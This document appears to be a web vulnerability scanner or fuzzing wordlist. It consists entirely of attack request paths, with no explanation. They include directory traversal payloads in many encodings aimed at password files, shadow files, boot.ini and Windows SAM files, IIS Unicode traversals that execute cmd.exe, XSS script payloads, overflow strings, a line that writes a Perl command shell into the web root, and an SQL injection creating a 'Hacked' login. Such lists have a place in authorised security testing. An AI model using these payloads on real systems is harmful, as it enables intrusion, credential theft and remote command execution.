/!Open
/!OpenServer
/"%20'60716363677F6274',%201,%201,%201,%201,%201,%20'Y',%201,"
/"%201,%201)
/"%20password,%20editactiontime,%20orgstructure,%20createviewtemplate,"
/"%20publishmacros,%20override_contract%20)%20VALUES%20('Hacked',"
/"%20removelogins,%20editlinkedfiles,%20newencrypt,%20showalljobs,"
/"><img%20src="javascriptt(xss)">
/"><script>alert('XSS')</script>
/"><script>alert(097531);</script>
/##php
/$LOCATION$footers.php?tinybb_footers=../../../../../../../../../../../../etc/passwd
/%
/%%%
/%00
/%00%00.nsf/../lotus/domino/notes.ini
/%00%00.nsf/../winnt/win.ini
/%00%20.nsf/../lotus/domino/notes.ini
/%00%20.nsf/../winnt/win.ini
/%00%c0%af.nsf/../lotus/domino/notes.ini
/%00%c0%af.nsf/../winnt/win.ini
/%00...nsf/../lotus/domino/notes.ini
/%00...nsf/../winnt/win.ini
/%00.nsf.nsf/../lotus/domino/notes.ini
/%00.nsf.nsf/../winnt/win.ini
/%00.nsf/../../lotus/domino/notes.ini
/%00.nsf/../../winnt/win.ini
/%00.nsf/..//lotus/domino/notes.ini
/%00.nsf/..//winnt/win.ini
/%00.nsf/../lotus/domino/notes.ini
/%00.nsf/../winnt/win.ini
/%00.nsf//../lotus/domino/notes.ini
/%00.nsf//../winnt/win.ini
/%00/
/%0a%0a
/%0a%0d%0a%0d<script>alert(XSS)</script>
/%20
/%20%00.nsf/../lotus/domino/notes.ini
/%20%00.nsf/../winnt/win.ini
/%20..\%20..\%20..\%20..\%20..\%20..\%20..\boot.ini
/%20..\%20..\%20..\%20..\%20..\%20..\%20..\winnt\win.ini
/%20.nsf/..//lotus/domino/notes.ini
/%20.nsf/..//winnt/win.ini
/%20.nsf//../lotus/domino/notes.ini
/%20.nsf//../winnt/win.ini
/%20.xtp
/%22%3cscript%3e
/%252e%252e/%252e%252e/%00.jsp
/%25n
/%2bADw-SCRIPT%2bAD4-alert(xss)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida
/%2bADw-SCRIPT%2bAD4-alert(xss)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
/%2e%2e/%2e%2e/%00.jsp
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/motd
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/winnt/win.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/boot.ini
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/%2E%2E/%2E%2E/Program%20Files/AnalogX/SimpleServer/www/server.log
/%2e%2e/%2e%2e/scandisk.log
/%2E/
/%2ehtpasswd
/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini
/%2f..%2f..%2f../
/%2f..%2f..%2f../winnt/repair/sam
/%2f..%2f..%2f../ws4d.log.txt
/%2F/
/%3c/a%3e%3cscript%3e
/%3c/title%3e%3c
/%3cscript%3ealert(%22CSS%22)%3c/script%3e/
/%3Cscript%3Ealert('XSS')%3C/script%3E.do
/%3Cscript%3Ealert('XSS');%3C/script%3E
/%3E%3Cscript%3Ealert(xss)%3C/script%3E
/%3f.jsp
/%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5C%2E%2E%5Cboot%2Eini
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
/%5c..%5c..%5c..%5cwindows%5cwin%2eini
/%5c..%5c..%5c..%5cwindows%5cwin.ini
/%5C/
/%63%67%69%2d%62%69%6e/%74%65%73%74%2d%63%67%69 
/%77s_ftp.ini 
/%7Eadmin/
/%7Ebin/
/%7Eetc/
/%7Eguest/
/%7Ehome/
/%7Elog/
/%7Enobody/
/%7Eroot/
/%7Esbin/
/%7Estats/
/%7Eusr/
/%7Evar/
/%7Ewebstats/
/%7Ewsdocs/
/%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1f%80%1b%c0%1fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xfd\xe7%dc\x80AAAAAAAAAAAAAAAAAAAA%fd%c3%16%58%ff%21%d7%acAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.shtml
/%a%s%p%d
/%bg%ae%bg%ae/%bg%ae%bg%ae/winnt/system32/cmd.exe?/c+dir
/%c0%9u%c0%9u/%c0%9u%c0%9u/winnt/system32/cmd.exe?/c+dir
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/win.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/winnt/system32/cmd.exe?/c+dir
/%c0%af%00.nsf/../lotus/domino/notes.ini
/%c0%af%00.nsf/../winnt/win.ini
/%c0%af.nsf/..//lotus/domino/notes.ini
/%c0%af.nsf/..//winnt/win.ini
/%c0%af.nsf//../lotus/domino/notes.ini
/%c0%af.nsf//../winnt/win.ini
/%c0%qe%c0%qe/%c0%qe%c0%qe/winnt/system32/cmd.exe?/c+dir
/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/%cg%9u%cg%9u/%cg%9u%cg%9u/winnt/system32/cmd.exe?/c+dir
/%cg%ae%cg%ae/%cg%ae%cg%ae/winnt/system32/cmd.exe?/c+dir
/%cg%qe%cg%qe/%cg%qe%cg%qe/winnt/system32/cmd.exe?/c+dir
/%d0%9u%d0%9u/%d0%9u%d0%9u/winnt/system32/cmd.exe?/c+dir
/%d0%ae%d0%ae/%d0%ae%d0%ae/winnt/system32/cmd.exe?/c+dir
/%d0%qe%d0%qe/%d0%qe%d0%qe/winnt/system32/cmd.exe?/c+dir
/%dg%80%ae%dg%80%ae/%dg%80%ae%dg%80%ae/winnt/system32/cmd.exe?/c+dir
/%dg%80%qe%dg%80%qe/%dg%80%qe%dg%80%qe/winnt/system32/cmd.exe?/c+dir
/%dg%o0%9u%dg%o0%9u/%dg%o0%9u%dg%o0%9u/winnt/system32/cmd.exe?/c+dir
/%dg%o0%ae%dg%o0%ae/%dg%o0%ae%dg%o0%ae/winnt/system32/cmd.exe?/c+dir
/%dg%o0%qe%dg%o0%qe/%dg%o0%qe%dg%o0%qe/winnt/system32/cmd.exe?/c+dir
/%e0%80%9u%e0%80%9u/%e0%80%9u%e0%80%9u/winnt/system32/cmd.exe?/c+dir
/%e0%80%ae%e0%80%ae/%e0%80%ae%e0%80%ae/winnt/system32/cmd.exe?/c+dir
/%e0%o0%9u%e0%o0%9u/%e0%o0%9u%e0%o0%9u/winnt/system32/cmd.exe?/c+dir
/%e0%o0%ae%e0%o0%ae/%e0%o0%ae%e0%o0%ae/winnt/system32/cmd.exe?/c+dir
/%e0%o0%qe%e0%o0%qe/%e0%o0%qe%e0%o0%qe/winnt/system32/cmd.exe?/c+dir
/%s%s%s
/%u0%7g%9u%e0%7g%9u/%e0%7g%9u%e0%7g%9u/winnt/system32/cmd.exe?/c+dir
/%u0%7g%ae%e0%7g%ae/%e0%7g%ae%e0%7g%ae/winnt/system32/cmd.exe?/c+dir
/%u0%7g%qe%e0%7g%qe/%e0%7g%qe%e0%7g%qe/winnt/system32/cmd.exe?/c+dir
/%u0%80%9u%u0%80%9u/%u0%80%9u%u0%80%9u/winnt/system32/cmd.exe?/c+dir
/%u0%80%ae%u0%80%ae/%u0%80%ae%u0%80%ae/winnt/system32/cmd.exe?/c+dir
/%u002F%u002E%u002E%u005C%u002E%u002E%u0075%u0030%u0030%u0032%u0035%u0075%u0030%u0030%u0035%u0063%u0057%u0049%u004E%u004E%u0054%u002F%u0073%u0079%u0073%u0074%u0065%u006D%u0033%u0032%u002Fcmd.exe?/c+dir+c:
/&lt
/*.*
/*.jsp/
/*.jsp::$DATA/
/*.shtml/login.jsp
/++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++<script>alert('XSS');</script>.idc
/++/
/+./
/+/
/+/index.jsp
/+ADw-SCRIPT+AD4-alert(xss)+ADw-+AC8-SCRIPT+AD4-.ida
/+ADw-SCRIPT+AD4-alert(xss)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
/-cgi-bin
/-icons
/."./
/."./."./."./."./."./."./winnt/win.ini%20.php3
/."./."./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\InetPub\wwwroot\cmd.pl+&+.pl
/."./."./winnt/win.ini%20.php3
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini
/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd
/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/.*/ldapcalhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA%3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB
/..
/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/..%%35%63../winnt/system32/cmd.exe?/c+dir
/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:
/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
/..%%35c../winnt/system32/cmd.exe?/c+dir
/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\
/..%25%35%63../winnt/system32/cmd.exe?/c+dir
/..%252f..%252f..%252f..%252f..%252f../windows/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam
/..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._
/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:
/..%252f../httpodbc.dll
/..%252f../winnt/system32/cmd.exe?/c+dir
/..%255c%255c../winnt/system32/cmd.exe?/c+dir
/..%255c..%255../
/..%255c..%255/
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../boot.ini
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../windows/win.ini
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c../winnt/win.ini
/..%255c..%255c..%255c..%255c..%255c../windows/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam
/..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._
/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/..%255c..%255c..%255c..%255cwindows/system32/cmd.exe?/c+dir
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/..%255C../..%255C../..%255C../winnt/system32/cmd.exe?/c%20dir
/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/..%255c../winnt/system32/cmd.exe?/c+dir
/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam
/..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._
/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini
/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/windows/win.ini
/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini
/..%5C..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
/..%5C..%5C..%5C..%5C..%5C..%5C/boot.ini
/..%5C../..%5C../..%5C../..%5C../..%5Cboot.ini
/..%5C../..%5C../..%5C../..%5C../etc/passwd
/..%bg%9v../winnt/system32/cmd.exe?/c+dir
/..%bg%af../winnt/system32/cmd.exe?/c+dir
/..%bg%qf../winnt/system32/cmd.exe?/c+dir
/..%c0%9v..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:
/..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir
/..%c0%9v../winnt/system32/cmd.exe?/c+
/..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:
/..%C0%AF../..%C0%AF../..%C0%AF../..%C0%AF../boot.ini
/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir
/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../boot.ini
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../windows/win.ini
/..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/win.ini
/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+
/..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
/..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:Or
/..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:
/..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir
/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../boot.ini
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../windows/win.ini
/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c../winnt/win.ini
/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+
/..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:
/..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir
/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
/..%c1%af..%c1%af../winnt/system32/cmd.exe?/c+dir+c:
/..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir
/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:
/..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir
/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/..%c1%pc..c1%pc../winnt/system32/cmd.exe?/c+dir+c:
/..%cg%9v../winnt/system32/cmd.exe?/c+dir
/..%cg%af../winnt/system32/cmd.exe?/c+dir
/..%cg%qf../winnt/system32/cmd.exe?/c+dir
/..%ch%8s../winnt/system32/cmd.exe?/c+dir
/..%ch%9c../winnt/system32/cmd.exe?/c+dir
/..%ch%pc../winnt/system32/cmd.exe?/c+dir
/..%d0%9v../winnt/system32/cmd.exe?/c+dir
/..%d0%af../winnt/system32/cmd.exe?/c+dir
/..%d0%qf../winnt/system32/cmd.exe?/c+dir
/..%d1%8s../winnt/system32/cmd.exe?/c+dir
/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/..%d1%pc../winnt/system32/cmd.exe?/c+dir
/..%e0%80%af..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:
/..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/..%f0%80%80%af..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir
/..%f8%80%80%80%af..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/..%fc%80%80%80%80%af..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:
/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir
/..%s0%9v../winnt/system32/cmd.exe?/c+dir
/..%s0%af../winnt/system32/cmd.exe?/c+dir
/..%s0%qf../winnt/system32/cmd.exe?/c+dir
/..%t0%af../winnt/system32/cmd.exe?/c+dir
/..%t0%qf../winnt/system32/cmd.exe?/c+dir
/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\
/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
/...................../config.sys         
/..................../boot.ini            
/.................../boot.ini             
/................../boot.ini              
/................../config.sys
/................../etc/passwd
/................./boot.ini               
/................/boot.ini                
/.............../boot.ini                 
/............../boot.ini                  
/............./boot.ini                   
/............/boot.ini                    
/.........../boot.ini                     
/........../boot.ini
/........../boot.ini                      
/........../windows/win.ini
/........./autoexec.bat
/........./boot.ini                       
/......../
/......../boot.ini                        
/......../|/........./
/......./boot.ini                         
/....../......ida/con
/....../autoexec.bat
/....../boot.ini
/....../boot.ini                          
/....../config.sys
/....../etc/hosts
/....../etc/master.passwd
/....../etc/passwd
/....../etc/security/passwd
/....../etc/security/passwd.adjunct
/....../etc/shadow
/....../Windows/Admin.pwl
/....../Winnt/Admin.pwl
/......autoexec.bat
/...../boot.ini
/...../boot.ini                           
/..../autoexec.bat
/..../boot.ini                            
/..../config.sys
/..../etc/motd
/..../scandisk.log
/..../Windows/Admin.pwl
/..../Windows/Admin.pwl 
/..../winnt/repair/sam._
/.../
/.../.../
/.../.../.../
/.../.../.../.../
/.../.../.../.../.../
/.../.../.../.../.../.../
/.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../.../.../.../.../.../.../.../
/.../.../.../.../.../.../.../.../.../.../.../.../...//boot.ini
/.../.../.../.../.../.../.../.../.../boot.ini
/.../.../.../winnt/system32/cmd.exe?/c+dir
/.../boot.ini                             
/...nsf/..//lotus/domino/notes.ini
/...nsf/..//winnt/win.ini
/...nsf//../lotus/domino/notes.ini
/...nsf//../winnt/win.ini
/../
/../..
/../../
/../../../
/../../../../
/../../../../../
/../../../../../../
/../../../../../../../
/../../../../../../../../
/../../../../../../../../../
/../../../../../../../../../../
/../../../../../../../../../../../
/../../../../../../../../../../../../
/../../../../../../../../../../../../../
/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../
/../../../../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../WINNT/system32/ipconfig.exe
/../../../../../../../../../boot.ini
/../../../../../../../../boot.ini
/../../../../../../../../etc/passwd
/../../../../../../../../windows/win.ini
/../../../../../../../../winnt/win.ini
/../../../../../../../boot.ini
/../../../../../../../etc/passwd
/../../../../../../../winnt/win.ini
/../../../../../../boot.ini
/../../../../../../Scandisk.log
/../../../../../.rhosts
/../../../../../boot.ini
/../../../../../etc/passwd
/../../../../../winnt/repair/sam._
/../../../../boot.ini
/../../../../config.sys
/../../../../etc/passwd
/../../../../winnt/repair/sam._
/../../../autoexec.bat
/../../../boot.ini
/../../../etc/passwd
/../../../scandisk.log
/../../boot.ini
/../../cmd.exe?%2FC+echo+\'hacked!\'>c:\\hello.bat
/../../config.sys
/../../etc/passwd
/../../i386/hosts
/../../passwd
/../../shadow
/../../windows/user.dat
/../../winnt/win.ini
/../<script>alert('css')</script>
/../<script>alert(xss)</script>
/../boot.ini                              
/../data/passwd.txt
/../examples//WEB-INF/../../../../
/../root/
/..<script>alert(xss)</script>
/..\
/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:
/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
/..\..\..\..\..\..\..\boot.ini
/..\..\..\..\..\..\autoexec.bat
/..\..\..\..\..\..\boot.ini
/..\..\..\..\..\..\temp\temp.class
/..\..\..\..\..\autoexec.bat
/..\..\..\..\autoexec.bat
/..\..\..\autoexec.bat
/..\..\..\winnt\repair\sam._
/..\..\autoexec.bat
/..\/..\
/..\/..\/..\
/..\/..\/..\/..\
/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\/..\/..\/..\
/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\
/..\\..\\..\winnt\repair\sam._
/..\\..\\..\\..\\..\\..\autoexec.bat
/..\\..\\..\\..\\..\\..\\..\\boot.ini
/..\\..\\..\\..\\..\\..\\winnt\system32\cmd.exe?/c+dir+c:\\
